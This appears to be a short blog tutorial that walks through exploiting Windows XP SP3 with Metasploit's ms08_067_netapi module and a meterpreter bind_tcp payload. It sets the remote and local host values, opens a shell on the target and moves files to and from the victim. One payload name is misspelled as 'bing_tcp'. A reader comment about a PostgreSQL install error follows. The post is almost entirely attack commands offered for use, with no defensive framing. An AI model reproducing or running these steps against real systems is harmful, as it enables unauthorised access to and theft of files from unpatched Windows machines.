Hacking XP SP3 with BackTrack Using Metasploit

Shell access hacking in metasploit XP SP3
Enter msconsole.
Use windows/smb/ms08_067_netapi <enter>
show exploits shows what exploits can be used.
set payload windows/meterpreter/bind_tcp <enter>
This will allow you to use meterpreter to connect to the shell of the XP box
Show options <enter>
set RPORT 445 (Optional, but recommended) <enter>
set RHOST (remote host) *the machine you are attacking’s IP address* <enter>
set LHOST (local host) *your backtrack machine’s IP address* <enter>
exploit <enter>
This will give you access into the XP box
if you want shell access, type in shell.
NOTE: when you type in shell, you will need to use DOS commands! dir- will display folder contents (ls)

To transfer files, you MUST NOT be in meterpreter. If you are in the Windows shell, type “exit” to get out
Syntax:
download c:\\FILE\PATH\TO\FILE /LOCATION/TO/SAVE/ON/BackTrack
upload /FILE/ON/BackTrack c:\\LOCATION\TO\COPY
For a video, see http://www.youtube.com/watch?v=fj4ckhacLrE except use “set payload windows/meterpreter/bing_tcp <enter>” for whatever they use for the payload. I’ll possibly post a video later.

More Info:
http://www.offensive-security.com/metasploit-unleashed/Metasploit_Meterpreter_Basics

2 thoughts on “Hacking XP SP3 with BackTrack Using Metasploit

  1. As a Backtrack 5 distribution Metasploit has aladrey integrated Postgresql database (by default) this is clear. But in n900 i am not able to install the postgresql database package (maemo armel) trying to run on Metasploit Framework 4. I get the following error in my x-terminal : Setting up postgresql-client-8.3 (8.3.3-0maemo1) /var/lib/dpkg/info/postgresql-client-8.3.postinst: .: line 5: can’t open /usr/share/postgresql-common/maintscripts-functionsdpkg: error processing postgresql-client-8.3 ( configure):subprocess post-installation script returned error exit status 2dpkg: dependency problems prevent configuration of postgresql-client:postgresql-client depends on postgresql-client-8.3; however:Package postgresql-client-8.3 is not configured yet.dpkg: error processing postgresql-client ( configure):dependency problems leaving unconfiguredErrors were encountered while processing:postgresql-client-8.3postgresql-clientE: Sub-process /usr/bin/dpkg returned an error code (1)any ideas how can i fix this? thanks in advance

Leave a Reply